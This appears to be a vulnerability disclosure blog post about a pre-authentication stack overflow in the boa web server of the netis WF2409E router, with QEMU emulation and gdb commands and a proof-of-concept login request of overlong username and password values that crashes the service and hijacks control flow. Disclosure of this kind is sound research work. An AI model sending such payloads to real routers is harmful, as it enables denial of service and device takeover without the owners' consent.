Buffer Overflow in boa of netis_WF2409E

Principle of Vulnerability

During my internship at Qi An Xin Tiangong Lab, I discovered a stack overflow vulnerability in the netis_WF2409E router.

sub_4110d4 is the authentication logic. It concatenates the username and passwd to v5 and then compares it with sys_passwd. However, since sprintf does not perform length checking, an overflow occurs. Therefore, this is a vulnerability before authentication.

Simulate using QEMU.

Start a web service by simulating BOA with QEMU.

1	`sudo chroot ./ ./qemu-mips-static -L ./lib ./bin/boa -p /web -f /etc/boa.conf`

poc

Pass parameters

1	`username=1111111111111111111111111111111111111111111111111111111&passwd=11111111111111111111111111111111111111111`

It can be observed that the web service has crashed completely.

ff4faca66748100cccc85aa36addeb8e

Debug using gdb.

1	`sudo chroot ./ ./qemu-mips-static -L ./lib -g 1234 ./bin/boa -p /web -f /etc/boa.conf`

eb26f09d82a5d9b23d33329823ea002e

It can be seen that the program has overflowed and controlled the program execution flow. If necessary, more overflow can be performed to construct a ROP chain.

#cve

Buffer Overflow in boa of netis_WF2409E

https://lafdrew.github.io/2025/04/25/Buffer-Overflow-in-boa-of-netis-WF2409E/

Author

John Doe

Posted on

April 25, 2025

Licensed under

Buffer Overflow in upload.cgi of iptime_nas_1.5.04 Previous

web_sys_infoContact_post_contact Next